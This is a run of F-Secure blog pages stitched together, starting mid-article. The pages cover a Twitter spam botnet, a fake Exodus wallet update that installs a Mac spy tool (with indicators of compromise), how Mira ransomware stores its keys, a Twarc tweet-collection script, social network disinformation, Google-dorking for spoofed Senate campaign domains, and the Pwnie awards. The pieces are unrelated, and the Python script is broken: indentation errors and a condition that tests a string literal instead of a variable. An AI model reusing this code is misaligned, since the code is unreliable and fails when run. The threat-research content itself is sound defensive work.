Here’s the oldest Tweet I found:

This data, on it’s own, would refute the theory that the owner of this botnet has been recently retooling. However, a closer look at some of the discovered accounts reveals an interesting story. Here are a few examples.

This account took a 6 year break from Twitter, and switched language to English.

This account mentions a “url in last post” in its bio, but there isn’t one.

This account went from posting in Korean to posting in English, with a 3 year break in between. However, the newer Tweet mentions “url in bio”. Sounds vaguely familiar.

Examining the text contained in the last Tweets from these discovered accounts revealed around 76,000 unique Tweets. Searching these Tweets for links containing the URL shortening services used by the previous botnet revealed 8,200 unique Tweets. Here’s a graph of the creation dates of those particular Tweets.

As we can see, the Tweets containing shortened URLs date back only 21 days. Here’s a distribution of domains seen in those Tweets.

My current hypothesis is that the owner of the previous botnet has purchased a batch of Twitter accounts (of varying ages) and has been, at least for the last 21 days, repurposing those accounts to advertise adult dating sites using the new pinned-Tweet approach.

One final thing – I checked the 2895 survivor accounts from the previously discovered botnet to see if any had been reconfigured to use a pinned Tweet. At the time of checking, only one of those accounts had been changed.

If you’re interested in looking at the data I collected, I’ve uploaded names/ids of all discovered accounts, the follower/following mappings found between these accounts, the gephi save file for the 80,000 node graph, and a list of accounts queried by my script (in case someone would like to continue iterating through the unqueried accounts.) You can find all of that data in this github repo.



Articles with similar Tags
#####EOF##### Ransomware | News from the Lab
Articles with the Tag

#ransomware

#####EOF##### Boost | News from the Lab
Articles with the Tag

#boost

#####EOF##### Crypto | News from the Lab
Articles with the Tag

#crypto

#####EOF##### #####EOF##### Spam campaign targets Exodus Mac Users | News from the Lab

Spam campaign targets Exodus Mac Users

We’ve seen a small spam campaign that attempts to target Mac users that use Exodus, a multi-cryptocurrency wallet.

The theme of the email focuses mainly on Exodus. The attachment was “Exodus-MacOS-1.64.1-update.zip” and the sender domain was “update-exodus[.]io”, suggesting that it wanted to associate itself to the organization. It was trying to deliver a fake Exodus update by using the subject “Update 1.64.1 Release – New Assets and more”. Whereas, the latest released version for Exodus is 1.63.1.

Fake Exodus Update email

Extracting the attached archive leads to the application which was apparently created yesterday.

Spytool’s creation date

The application contains a mach-O binary with the filename “rtcfg”. The legitimate Exodus application, however, uses “Exodus”.

We checked out the strings and found a bunch of references to “realtime-spy-mac[.]com” website.

From the website, the developer described their software as a cloud-based surveillance and remote spy tool. Their standard offering costs $79.95 and comes with a cloud-based account where users can view the images and data that the tool uploaded from the target machine. The strings that was extracted from the Mac binary from the mail spam coincides with the features mentioned in the realtime-spy-mac[.]com tool.

Strings inside the Realtime-Spy tool

Searching for similar instances of the Mac keylogger in our repository yielded to other samples using these filenames:

  • taxviewer.app
  • picupdater.app
  • macbook.app
  • launchpad.app

Based on the spy tool’s website, it appears that it does not only support Mac, but Windows as well. It’s not the first time that we’ve seen Windows threats target Mac. As the crimeware threat actors in Windows take advantage of the cryptocurrency trend, they too seem to want to expand their reach, thus also ended up targeting Mac users.

Indicators of Compromise

SHA1:

  • b6f5a15d189f4f30d502f6e2a08ab61ad1377f6a – rtcfg
  • 3095c0450871f4e1d14f6b1ccaa9ce7c2eaf79d5 – Exodus-MacOS-1.64.1-update.zip
  • 04b9bae4cc2dbaedc9c73c8c93c5fafdc98983aa – picupdater.app.zip
  • c22e5bdcb5bf018c544325beaa7d312190be1030 – taxviewer.app.zip
  • d3150c6564cb134f362b48cee607a5d32a73da66 – launchpad.app.zip
  • bf54f81d7406a7cfe080b42b06b0a6892fcd2f37 – macbook.app.zip

Detection:

  • Monitor:OSX/Realtimespy.b6f5a15d18!Online

Domain:

  • realtime-spy-mac[.]com
  • update-exodus[.]io

 



Articles with similar Tags
#####EOF##### F-Secure
F-Secure RADAR
Подсигурете периметъра
F-SECURE INTERNET SECURITY
Всепризнатата защита F-Secure Internet Security Ви позволява да сърфирате в интернет, пазарувате онлайн и използвате онлайн банкиране без да се притеснявате за сигурността си. С F-Secure Internet Security Вие получавате моментална защита от зловреден софтуер, хакери и кражба на самоличност.
КОРПОРАТИВНИ ПАКЕТИ ЗА ЗАЩИТА
Предлагаме Ви два пакета за корпоративна защита в зависимост от Вашите нужди
СТАНЕТЕ НАШ ПАРТНЬОР
Нашата партньорска програма е съчетание от: финансови ползи, услуги и инструменти в помощ на Вашето бизнес развитие.

НАЙ-ДОБРАТА АНТИВИРУСНА ЗАЩИТА ЗА ВАС И ВАШИЯТ КОМПЮТЪР

С над 26 години опит в информационната сигурност, F-Secure предлага цялостни решения за защита на всяко устройство. Нашите продукти включват модули за антивирусна защита, защитна стена, управление на приложенията, защита от кражба на мобилни устройства, защита на личните данни от всякакъв вид заплахи, родителски контрол и други жизненоважни компоненти. Изберете най-правилното решение за Вас.

F-SECURE
INTERNET
SECURITY

  • Безгрижно сърфиране в интернет
  • Родителски контрол
  • Сигурно онлайн банкиране
  • Защита за електронна поща
  • Автоматично обновяване

F-SECURE
SAFE

  • Защита за всякакъв тип устройства
  • Бърз и лесен за инсталиране
  • Защита срещу онлайн заплахи
  • Безопасно сърфиране в интернет
  • Сигурно онлайн банкиране

ОПИТЪТ Е КЛЮЧА КЪМ УСПЕХА

НАЙ-ДОБРАТА ЗАЩИТА ГОДИНА СЛЕД ГОДИНА

Технологията, използвана в решенията F-Secure е отличена в 5 от шест поредни години с наградата „Best Protection“ за корпоративна защита на независимата лаборатория AV-TEST (2011-2016).

СВАЛЕТЕ НАЙ-НОВИТЕ ВЕРСИИ НА ПРОДУКТИТЕ F-SECURE

ИНФОДИЗАЙН ГРУП Е ЕДИНСТВЕН ОТОРИЗИРАН ДИСТРИБУТОР НА F-SECURE ЗА ТЕРИТОРИЯТА НА БЪЛГАРИЯ, РУМЪНИЯ И МОЛДОВА

РЕШЕНИЯ ЗА ЗАЩИТА НА БИЗНЕСА

F-Secure съчетава функционалността с автоматичните актуализации на софтуерните приложения на трети производители, предоставяйки интелигентни решения, както за малки фирми, така и за големи корпорации.

PROTECTION SERVICE FOR BUSINESS

Цялостно решение за защита на малкия и среден бизнес, управлявано чрез уеб конзола.

MESSAGING SECURITY
GATEWAY

Специализирано решение за филтриране на имейл трафика. Спрете до 99% от спама!

SECURITY FOR VIRTUAL AND CLOUD ENVIRONMENT

Решение за защита на виртуални среди от тип VMware, Citrix, HyperV.

СТАНЕТЕ НАШ ПАРТНЬОР

Нашата партньорска програма включва: финансови ползи, услуги и инструменти, които ще ви помогнат в изграждането на Вашия бизнес. F-Secure е първият и единствен производител, отличен в 5 от шест поредни години с наградата „Best Protection“ за корпоративна защита на независимата лаборатория AV-TEST (2011-2016).

ЗАЩО ДА СТАНЕТЕ НАШ ПАРТНЬОР?

Максимизирайте Вашата печалба като станете наш партньор.

НАШИТЕ ПАРТНЬОРИ

Намерете най-близкия до Вас партньор.

ИМАТЕ НУЖДА ОТ ПОВЕЧЕ ИНФОРМАЦИЯ?

Не губете време! Свържете се с нас СЕГА!

Contact Us

We're not around right now. But you can send us an email and we'll get back to you, asap.

Not readable? Change text. captcha txt

Start typing and press Enter to search

#####EOF##### CryptoMiner | News from the Lab
Articles with the Tag

#cryptominer-2

#####EOF##### Frederic Vila | News from the Lab
About

Frederic Vila

Latest articles from

Frederic Vila

#####EOF##### Khasaia | News from the Lab
About

Khasaia


Junior Threat Researcher @ F-Secure
Twitter: @_qaz_qaz

Latest articles from

Khasaia

#####EOF##### Mira Ransomware Decryptor | News from the Lab

Mira Ransomware Decryptor

We investigated some recent Ransomware called Mira (Trojan:W32/Ransomware.AN) in order to check if it’s feasible to decrypt the encrypted files.

Most often, decryption can be very challenging because of missing keys that are needed for decryption. However, in the case of Mira ransomware, it appends all information required to decrypt an encrypted file into the encrypted file itself.

Encryption Process

The ransomware first initializes a new instance of the Rfc2898DeriveBytes class to generate a key. This class takes a password, salt, and iteration count.

1

The password is generated using the following information:

  • Machine name
  • OS Version
  • Number of processors

2

The salt, on the other hand, is generated by a Random Number Generator (RNG):

3

The ransomware then proceeds to use the Rijndael algorithm to encrypt files:

Untitled

After encryption, it appends a ‘header‘ structure to the end of the file.

This header conveniently contains the salt and the password hash. In addition to that, the iteration count is hard-coded into the sample, in this case, the value was 20.

By retrieving the password, salt, and the iteration count from the ransomware itself, we were able to obtain all the information needed to create a decryption tool for the encrypted files.

Decryption tool

You can download our decryption tool from here.

Here’s a video of how you can use our tool:

 



Articles with similar Tags
#####EOF##### Searching Twitter With Twarc | News from the Lab

Searching Twitter With Twarc

Twarc makes it really easy to search Twitter via the API. Simply create a twarc object using your own API keys and then pass your search query into twarc’s search() function to get a stream of Tweet objects. Remember that, by default, the Twitter API will only return results from the last 7 days. However, this is useful enough if we’re looking for fresh information on a topic.

Since this methodology is so simple, posting code for a tool that simply prints the resulting tweets to stdout would make for a boring blog post. Here I present a tool that collects a bunch of metadata from the returned Tweet objects. Here’s what it does:

  • records frequency distributions of URLs, hashtags, and users
  • records interactions between users and hashtags
  • outputs csv files that can be imported into Gephi for graphing
  • downloads all images found in Tweets
  • records each Tweet’s text along with the URL of the Tweet

The code doesn’t really need explanation, so here’s the whole thing.

from collections import Counter
from itertools import combinations
from twarc import Twarc
import requests
import sys
import os
import shutil
import io
import re
import json

# Helper functions for saving json, csv and formatted txt files
def save_json(variable, filename):
  with io.open(filename, "w", encoding="utf-8") as f:
    f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def save_csv(data, filename):
  with io.open(filename, "w", encoding="utf-8") as handle:
    handle.write(u"Source,Target,Weight\n")
    for source, targets in sorted(data.items()):
      for target, count in sorted(targets.items()):
        if source != target and source is not None and target is not None:
          handle.write(source + u"," + target + u"," + unicode(count) + u"\n")

def save_text(data, filename):
  with io.open(filename, "w", encoding="utf-8") as handle:
    for item, count in data.most_common():
      handle.write(unicode(count) + "\t" + item + "\n")

# Returns the screen_name of the user retweeted, or None
def retweeted_user(status):
  if "retweeted_status" in status:
    orig_tweet = status["retweeted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        return user["screen_name"]

# Returns a list of screen_names that the user interacted with in this Tweet
def get_interactions(status):
  interactions = []
  if "in_reply_to_screen_name" in status:
    replied_to = status["in_reply_to_screen_name"]
    if replied_to is not None and replied_to not in interactions:
      interactions.append(replied_to)
  if "retweeted_status" in status:
    orig_tweet = status["retweeted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        if user["screen_name"] not in interactions:
          interactions.append(user["screen_name"])
  if "quoted_status" in status:
    orig_tweet = status["quoted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        if user["screen_name"] not in interactions:
          interactions.append(user["screen_name"])
  if "entities" in status:
    entities = status["entities"]
    if "user_mentions" in entities:
      for item in entities["user_mentions"]:
        if item is not None and "screen_name" in item:
          mention = item['screen_name']
          if mention is not None and mention not in interactions:
            interactions.append(mention)
  return interactions

# Returns a list of hashtags found in the tweet
def get_hashtags(status):
  hashtags = []
  if "entities" in status:
    entities = status["entities"]
    if "hashtags" in entities:
      for item in entities["hashtags"]:
        if item is not None and "text" in item:
          hashtag = item['text']
          if hashtag is not None and hashtag not in hashtags:
            hashtags.append(hashtag)
  return hashtags

# Returns a list of URLs found in the Tweet
def get_urls(status):
  urls = []
  if "entities" in status:
    entities = status["entities"]
      if "urls" in entities:
        for item in entities["urls"]:
          if item is not None and "expanded_url" in item:
            url = item['expanded_url']
            if url is not None and url not in urls:
              urls.append(url)
  return urls

# Returns the URLs to any images found in the Tweet
def get_image_urls(status):
  urls = []
  if "entities" in status:
    entities = status["entities"]
    if "media" in entities:
      for item in entities["media"]:
        if item is not None:
          if "media_url" in item:
            murl = item["media_url"]
            if murl not in urls:
              urls.append(murl)
  return urls

# Main starts here
if __name__ == '__main__':
# Add your own API key values here
  consumer_key=""
  consumer_secret=""
  access_token=""
  access_token_secret=""

  twarc = Twarc(consumer_key, consumer_secret, access_token, access_token_secret)

# Check that search terms were provided at the command line
  target_list = []
  if (len(sys.argv) > 1):
    target_list = sys.argv[1:]
  else:
    print("No search terms provided. Exiting.")
    sys.exit(0)

  num_targets = len(target_list)
  for count, target in enumerate(target_list):
    print(str(count + 1) + "/" + str(num_targets) + " searching on target: " + target)
# Create a separate save directory for each search query
# Since search queries can be a whole sentence, we'll check the length
# and simply number it if the query is overly long
    save_dir = ""
    if len(target) < 30:
      save_dir = target.replace(" ", "_")
    else:
      save_dir = "target_" + str(count + 1)
    if not os.path.exists(save_dir):
      print("Creating directory: " + save_dir)
      os.makedirs(save_dir)
# Variables for capturing stuff
    tweets_captured = 0
    influencer_frequency_dist = Counter()
    mentioned_frequency_dist = Counter()
    hashtag_frequency_dist = Counter()
    url_frequency_dist = Counter()
    user_user_graph = {}
    user_hashtag_graph = {}
    hashtag_hashtag_graph = {}
    all_image_urls = []
    tweets = {}
    tweet_count = 0
# Start the search
    for status in twarc.search(target):
# Output some status as we go, so we know something is happening
      sys.stdout.write("\r")
      sys.stdout.flush()
      sys.stdout.write("Collected " + str(tweet_count) + " tweets.")
      sys.stdout.flush()
      tweet_count += 1
    
      screen_name = None
      if "user" in status:
        if "screen_name" in status["user"]:
          screen_name = status["user"]["screen_name"]

      retweeted = retweeted_user(status)
      if retweeted is not None:
        influencer_frequency_dist[retweeted] += 1
      else:
        influencer_frequency_dist[screen_name] += 1

# Tweet text can be in either "text" or "full_text" field...
      text = None
      if "full_text" in status:
        text = status["full_text"]
      elif "text" in status:
        text = status["text"]

      id_str = None
      if "id_str" in status:
        id_str = status["id_str"]

# Assemble the URL to the tweet we received...
      tweet_url = None
      if "id_str" is not None and "screen_name" is not None:
        tweet_url = "https://twitter.com/" + screen_name + "/status/" + id_str

# ...and capture it
      if tweet_url is not None and text is not None:
        tweets[tweet_url] = text

# Record mapping graph between users
      interactions = get_interactions(status)
        if interactions is not None:
          for user in interactions:
            mentioned_frequency_dist[user] += 1
            if screen_name not in user_user_graph:
              user_user_graph[screen_name] = {}
            if user not in user_user_graph[screen_name]:
              user_user_graph[screen_name][user] = 1
            else:
              user_user_graph[screen_name][user] += 1

# Record mapping graph between users and hashtags
      hashtags = get_hashtags(status)
      if hashtags is not None:
        if len(hashtags) > 1:
          hashtag_interactions = []
# This code creates pairs of hashtags in situations where multiple
# hashtags were found in a tweet
# This is used to create a graph of hashtag-hashtag interactions
          for comb in combinations(sorted(hashtags), 2):
            hashtag_interactions.append(comb)
          if len(hashtag_interactions) > 0:
            for inter in hashtag_interactions:
              item1, item2 = inter
              if item1 not in hashtag_hashtag_graph:
                hashtag_hashtag_graph[item1] = {}
              if item2 not in hashtag_hashtag_graph[item1]:
                hashtag_hashtag_graph[item1][item2] = 1
              else:
                hashtag_hashtag_graph[item1][item2] += 1
          for hashtag in hashtags:
            hashtag_frequency_dist[hashtag] += 1
            if screen_name not in user_hashtag_graph:
              user_hashtag_graph[screen_name] = {}
            if hashtag not in user_hashtag_graph[screen_name]:
              user_hashtag_graph[screen_name][hashtag] = 1
            else:
              user_hashtag_graph[screen_name][hashtag] += 1

      urls = get_urls(status)
      if urls is not None:
        for url in urls:
          url_frequency_dist[url] += 1

      image_urls = get_image_urls(status)
      if image_urls is not None:
        for url in image_urls:
          if url not in all_image_urls:
            all_image_urls.append(url)

# Iterate through image URLs, fetching each image if we haven't already
      print
      print("Fetching images.")
      pictures_dir = os.path.join(save_dir, "images")
      if not os.path.exists(pictures_dir):
        print("Creating directory: " + pictures_dir)
        os.makedirs(pictures_dir)
      for url in all_image_urls:
        m = re.search("^http:\/\/pbs\.twimg\.com\/media\/(.+)$", url)
        if m is not None:
          filename = m.group(1)
          print("Getting picture from: " + url)
          save_path = os.path.join(pictures_dir, filename)
          if not os.path.exists(save_path):
            response = requests.get(url, stream=True)
            with open(save_path, 'wb') as out_file:
              shutil.copyfileobj(response.raw, out_file)
            del response

# Output a bunch of files containing the data we just gathered
      print("Saving data.")
      json_outputs = {"tweets.json": tweets,
                      "urls.json": url_frequency_dist,
                      "hashtags.json": hashtag_frequency_dist,
                      "influencers.json": influencer_frequency_dist,
                      "mentioned.json": mentioned_frequency_dist,
                      "user_user_graph.json": user_user_graph,
                      "user_hashtag_graph.json": user_hashtag_graph,
                      "hashtag_hashtag_graph.json": hashtag_hashtag_graph}
      for name, dataset in json_outputs.iteritems():
        filename = os.path.join(save_dir, name)
        save_json(dataset, filename)

# These files are created in a format that can be easily imported into Gephi
      csv_outputs = {"user_user_graph.csv": user_user_graph,
                     "user_hashtag_graph.csv": user_hashtag_graph,
                     "hashtag_hashtag_graph.csv": hashtag_hashtag_graph}
      for name, dataset in csv_outputs.iteritems():
        filename = os.path.join(save_dir, name)
        save_csv(dataset, filename)

      text_outputs = {"hashtags.txt": hashtag_frequency_dist,
                      "influencers.txt": influencer_frequency_dist,
                      "mentioned.txt": mentioned_frequency_dist,
                      "urls.txt": url_frequency_dist}
      for name, dataset in text_outputs.iteritems():
        filename = os.path.join(save_dir, name)
        save_text(dataset, filename)

Running this tool will create a directory for each search term provided at the command-line. To search for a sentence, or to include multiple terms, enclose the argument with quotes. Due to Twitter’s rate limiting, your search may hit a limit, and need to pause to wait for the rate limit to reset. Luckily twarc takes care of that. Once the search is finished, a bunch of files will be written to the previously created directory.

Since I use a Mac, I can use its Quick Look functionality from the Finder to browse the output files created. Since pytorch is gaining a lot of interest, I ran my script against that search term. Here’s some examples of how I can quickly view the output files.

The preview pane is enough to get an overview of the recorded data.

 

Pressing spacebar opens the file in Quick Look, which is useful for data that doesn’t fit neatly into the preview pane

Importing the user_user_graph.csv file into Gephi provided me with some neat visualizations about the pytorch community.

A full zoom out of the pytorch community

Here we can see who the main influencers are. It seems that Yann LeCun and François Chollet are Tweeting about pytorch, too.

Here’s a zoomed-in view of part of the network.

Zoomed in view of part of the Gephi graph generated.

If you enjoyed this post, check out the previous two articles I published on using the Twitter API here and here. I hope you have fun tailoring this script to your own needs!



Articles with similar Tags
#####EOF##### Why Social Network Analysis Is Important | News from the Lab

Why Social Network Analysis Is Important

I got into social network analysis purely for nerdy reasons – I wanted to write some code in my free time, and python modules that wrap Twitter’s API (such as tweepy) allowed me to do simple things with just a few lines of code. I started off with toy tasks, (like mapping the time of day that @realDonaldTrump tweets) and then moved onto creating tools to fetch and process streaming data, which I used to visualize trends during some recent elections.

The more I work on these analyses, the more I’ve come to realize that there are layers upon layers of insights that can be derived from the data. There’s data hidden inside data – and there are many angles you can view it from, all of which highlight different phenomena. Social network data is like a living organism that changes from moment to moment.

Perhaps some pictures will help explain this better. Here’s a visualization of conversations about Brexit that happened between between the 3rd and 4th of December, 2018. Each dot is a user, and each line represents a reply, mention, or retweet.

Tweets supportive of the idea that the UK should leave the EU are concentrated in the orange-colored community at the top. Tweets supportive of the UK remaining in the EU are in blue. The green nodes represent conversations about UK’s Labour party, and the purple nodes reflect conversations about Scotland. Names of accounts that were mentioned more often have a larger font.

Here’s what the conversation space looked like between the 14th and 15th of January, 2019.

Notice how the shape of the visualization has changed. Every snapshot produces a different picture, that reflects the opinions, issues, and participants in that particular conversation space, at the moment it was recorded. Here’s one more – this time from the 20th to 21st of January, 2019.

Every interaction space is unique. Here’s a visual representation of interactions between users and hashtags on Twitter during the weekend before the Finnish presidential elections that took place in January of 2018.

And here’s a representation of conversations that happened in the InfoSec community on Twitter between the 15th and 16th of March, 2018.

I’ve been looking at Twitter data on and off for a couple of years now. My focus has been on finding scams, social engineering, disinformation, sentiment amplification, and astroturfing campaigns. Even though the data is readily available via Twitter’s API, and plenty of the analysis can be automated, oftentimes finding suspicious activity just involves blind luck – the search space is so huge that you have to be looking in the right place, at the right time, to find it. One approach is, of course, to think like the adversary. Social networks run on recommendation algorithms that can be probed and reverse engineered. Once an adversary understands how those underlying algorithms work, they’ll game them to their advantage. These tactics share many analogies with search engine optimization methodologies. One approach to countering malicious activities on these platforms is to devise experiments that simulate the way attackers work, and then design appropriate detection methods, or countermeasures against these. Ultimately, it would be beneficial to have automation that can trace suspicious activity back through time, to its source, visualize how the interactions propagated through the network, and provide relevant insights (that can be queried using natural language). Of course, we’re not there yet.

The way social networks present information to users has changed over time. In the past, Twitter feeds contained a simple, sequential list of posts published by the accounts a user followed. Nowadays, Twitter feeds are made up of recommendations generated by the platform’s underlying models – what they understand about a user, and what they think the user wants to see.

A potentially dystopian outcome of social networks was outlined in a blog post written by François Chollet in May 2018, which he describes social media becoming a “psychological panopticon”.

The premise for his theory is that the algorithms that drive social network recommendation systems have access to every user’s perceptions and actions. Algorithms designed to drive user engagement are currently rather simple, but if more complex algorithms (for instance, based on reinforcement learning) were to be used to drive these systems, they may end up creating optimization loops for human behavior, in which the recommender observes the current state of each target (user) and keeps tuning the information that is fed to them, until the algorithm starts observing the opinions and behaviors it wants to see. In essence the system will attempt to optimize its users. Here are some ways these algorithms may attempt to “train” their targets:

  • The algorithm may choose to only show its target content that it believes the target will engage or interact with, based on the algorithm’s notion of the target’s identity or personality. Thus, it will cause a reinforcement of certain opinions or views in the target, based on the algorithm’s own logic. (This is partially true today)
  • If the target publishes a post containing a viewpoint that the algorithm doesn’t wish the target to hold, it will only share it with users who would view the post negatively. The target will, after being flamed or down-voted enough times, stop sharing such views.
  • If the target publishes a post containing a viewpoint the algorithm wants the target to hold, it will only share it with users that would view the post positively. The target will, after some time, likely share more of the same views.
  • The algorithm may place a target in an “information bubble” where the target only sees posts from friends that share the target’s views (that are desirable to the algorithm).
  • The algorithm may notice that certain content it has shared with a target caused their opinions to shift towards a state (opinion) the algorithm deems more desirable. As such, the algorithm will continue to share similar content with the target, moving the target’s opinion further in that direction. Ultimately, the algorithm may itself be able to generate content to those ends.

Chollet goes on to mention that, although social network recommenders may start to see their users as optimization problems, a bigger threat still arises from external parties gaming those recommenders in malicious ways. The data available about users of a social network can already be used to predict when a when a user is suicidal or when a user will fall in love or break up with their partner, and content delivered by social networks can be used to change users’ moods. We also know that this same data can be used to predict which way a user will vote in an election, and the probability of whether that user will vote or not.

If this optimization problem seems like a thing of the future, bear in mind that, at the beginning of 2019, YouTube made changes to their recommendation algorithms exactly because of problems it was causing for certain members of society. Guillaume Chaslot posted a Twitter thread in February 2019 that described how YouTube’s algorithms favored recommending conspiracy theory videos, guided by the behaviors of a small group of hyper-engaged viewers. Fiction is often more engaging than fact, especially for users who spend all day, every day watching YouTube. As such, the conspiracy videos watched by this group of chronic users received high engagement, and thus were pushed up the recommendation system. Driven by these high engagement numbers, the makers of these videos created more and more content, which was, in-turn, viewed by this same group of users. YouTube’s recommendation system was optimized to pull more and more users into a hole of chronic YouTube addiction. Many of the users sucked into this hole have since become indoctrinated with right-wing extremist views. One such user actually became convinced that his brother was a lizard, and killed him with a sword. Chaslot has since created a tool that allows users to see which of these types of videos are being promoted by YouTube.

Social engineering campaigns run by entities such as the Internet Research Agency, Cambridge Analytica, and the far-right demonstrate that social media advert distribution platforms (such as those on Facebook) have provided a weapon for malicious actors that is incredibly powerful, and damaging to society. The disruption caused by their recent political campaigns has created divides in popular thinking and opinion that may take generations to repair. Now that the effectiveness of these social engineering techniques is apparent, I expect what we’ve seen so far is just an omen of what’s to come.

The disinformation we hear about is only a fraction of what’s actually happening. It requires a great deal of time and effort for researchers to find evidence of these campaigns. As I already noted, Twitter data is open and freely available, and yet it can still be extremely tedious to find evidence of disinformation campaigns on that platform. Facebook’s targeted ads are only seen by the users who were targeted in the first place. Unless those who were targeted come forward, it is almost impossible to determine what sort of ads were published, who they were targeted at, and what the scale of the campaign was. Although social media platforms now enforce transparency on political ads, the source of these ads must still be determined in order to understand who’s being targeted, and by what content.

Many individuals on social networks share links to “clickbait” headlines that align with their personal views or opinions (sometimes without having read the content behind the link). Fact checking is uncommon, and often difficult for people who don’t have a lot of time on their hands. As such, inaccurate or fabricated news, headlines, or “facts” propagate through social networks so quickly that even if they are later refuted, the damage is already done. This mechanism forms the very basis of malicious social media disinformation. A well-documented example of this was the UK’s “Leave” campaign that was run before the Brexit referendum. Some details of that campaign are documented in the recent Channel 4 film: “Brexit: The Uncivil War”.

Its not just the engineers of social networks that need to understand how they work and how they might be abused. Social networks are a relatively new form of human communication, and have only been around for a few decades. But they’re part of our everyday lives, and obviously they’re here to stay. Social networks are a powerful tool for spreading information and ideas, and an equally powerful weapon for social engineering, disinformation, and propaganda. As such, research into these systems should be of interest to governments, law enforcement, cyber security companies and organizations that seek to understand human communications, culture, and society.

The potential avenues of research in this field are numerous. Whilst my research with Twitter data has largely focused on graph analysis methodologies, I’ve also started experimenting with natural language processing techniques, which I feel have a great deal of potential.

The Orville, “Majority Rule”. A vote badge worn by all citizens of the alien world Sargus 4, allowing the wearer to receive positive or negative social currency. Source: youtube.com

We don’t yet know how much further social networks will integrate into society. Perhaps the future will end up looking like the “Majority Rule” episode of The Orville, or the “Nosedive” episode of Black Mirror, both of which depict societies in which each individual’s social “rating” determines what they can and can’t do and where a low enough rating can even lead to criminal punishment.



Articles with similar Tags
#####EOF##### Disinformation | News from the Lab
Articles with the Tag

#disinformation

#####EOF##### brexit | News from the Lab
Articles with the Tag

#brexit

#####EOF##### How To Locate Domains Spoofing Campaigns (Using Google Dorks) #Midterms2018 | News from the Lab

How To Locate Domains Spoofing Campaigns (Using Google Dorks) #Midterms2018

The government accounts of US Senator Claire McCaskill (and her staff) were targeted in 2017 by APT28 A.K.A. “Fancy Bear” according to an article published by The Daily Beast on July 26th. Senator McCaskill has since confirmed the details.

And many of the subsequent (non-technical) articles that have been published has focused almost exclusively on the fact that McCaskill is running for re-election in 2018. But, is it really conclusive that this hacking attempt was about the 2018 midterms? After all, Senator McCaskill is the top-ranking Democrat on the Homeland Security & Governmental Affairs Committee and also sits on the Armed Services Committee. Perhaps she and her staffers were instead targeted for insights into on-going Senate investigations?

Senator Claire McCaskill's Committee Assignments

Because if you want to target an election campaign, you should target the candidate’s campaign server, not their government accounts. (Elected officials cannot use government accounts/resources for their personal campaigns.) In the case of Senator McCaskill, the campaign server is: clairemccaskill.com.

Which appears to be a WordPress site.

clairemccaskill.com/robots.txt

Running on an Apache server.

clairemccaskill.com Apache error log

And it has various e-mail addresses associated with it.

clairemccaskill.com email addresses

That looks interesting, right? So… let’s do some Google dorking!

Searching for “clairemccaskill.com” in URLs while discarding the actual site yielded a few pages of results.

Google dork: inurl:clairemccaskill.com -site:clairemccaskill.com

And on page two of those results, this…

clairemccaskill.com.de

Definitely suspicious.

Whats is com.de? It’s a domain on the .de TLD (not a TLD itself).

.com.de

Okay, so… what other interesting domains associated with com.de are there to discover?

How about additional US Senators up for re-election such as Florida Senator Bill Nelson? Yep.

nelsonforsenate.com.de

Senator Bob Casey? Yep.

bobcasey.com.de

And Senator Sheldon Whitehouse? Yep.

whitehouseforsenate.com.de

But that’s not all. Democrats aren’t the only ones being spoofed.

Iowa Senate Republicans.

iowasenaterepublicans.com.de

And “Senate Conservatives“.

senateconservatives.com.de

Hmm. Well, while being no more closer to knowing whether or not Senator McCaskill’s government accounts were actually targeted because of the midterm elections – the domains shown above are definitely shady AF. And enough to give cause for concern that the 2018 midterms are indeed being targeted, by somebody.

(Our research continues.)

Meanwhile, the FBI might want to get in touch with the owners of com.de.



Articles with similar Tags
#####EOF##### F-Secure SAFE – Protect your life on every device
My F-Secure

My F-Secure service

Don’t have F-Secure SAFE yet? Register now

Don’t have F-Secure SAFE yet? Register now

SAFE and TOTAL boxes

Not using SAFE or TOTAL?

Your browser is not supported

Unfortunately, the full functionality of My F-Secure is not available with your browser version.

To use My F-Secure, we recommended that you upgrade your browser to one of the following browsers:

F-Secure help
Choose your country or region
#####EOF##### DoublePulsar | News from the Lab
Articles with the Tag

#doublepulsar-2

#####EOF##### Kyb3r | News from the Lab
Articles with the Tag

#kyb3r

#####EOF##### Taking Pwnie Out On The Town | News from the Lab

Taking Pwnie Out On The Town

Black Hat 2018 is now over, and the winners of the Pwnie Awards have been published. The Best Client-Side Bug was awarded to Georgi Geshev and Rob Miller for their work called “The 12 Logic Bug Gifts of Christmas.”

Pwnies2018 The Pwnie Awards

Georgi and Rob work for MWR Infosecurity, which (as some of you might remember) was acquired by F-Secure earlier this year. Both MWR and F-Secure have a long history of geek culture. One thing we’ve done for years, is to take our trophies (or “Poikas”) for a trip around the town. For an example, see this.

So, while the Pwnie is still here in Helsinki before going home to UK, we took it around the town!

Pwnie2018 HQ

Pwnie at the F-Secure HQ.

Pwnie2018 Kanava

Pwnie at Ruoholahdenkanava.

Pwnie2018 Harbour

Pwnie at the West Harbour.

Pwnie2018 Baana

Pwnie looks at the Baana.

Pwnie2018 Museum

Pwnie and some Atari 2600s and laptops at the Helsinki computer museum.

Pwnie2018 MIG

Pwnie looking at a Mikoyan-Gurevich MiG-21 supersonic interceptor.

Pwnie2018 Tennispalatsi

Pwnie at the Art Museum.

Pwnie2018 awards

Pwnie chilling on our award shelf.

Pwnie2018 Parliament

Pwnie at the house of parliament.

pwnie2018_tuomiokirkko

Pwnie at the Tuomikirkko Cathedral.

Thanks for all the bugs, MWR!

Mikko

P.S. If you’re wondering about the word “Poika” we use for trophies, here’s a short documentary video that explains it in great detail.

Tags:


#####EOF##### OSINT For Fun & Profit: @realDonaldTrump Edition | News from the Lab

OSINT For Fun & Profit: @realDonaldTrump Edition

I’ve just started experimenting with Tweepy to write a series of scripts attempting to identify Twitter bots and sockpuppet rings. It’s been a while since I last played around with this kind of stuff, so I decided to start by writing a couple of small test scripts. In order to properly test it, I needed to point towards an active account. So, I opted for @realDonaldTrump.

After collecting data from the past 12 months, Sean and I realized that it should be broken into four separate sets to provide context. Here’s how we’ve broken it down.

  • All data from ~365 days ago, up until the day of the US presidential election (November 8th, 2016).
  • Data spanning the period between post-election and the inauguration (January 20th, 2017).
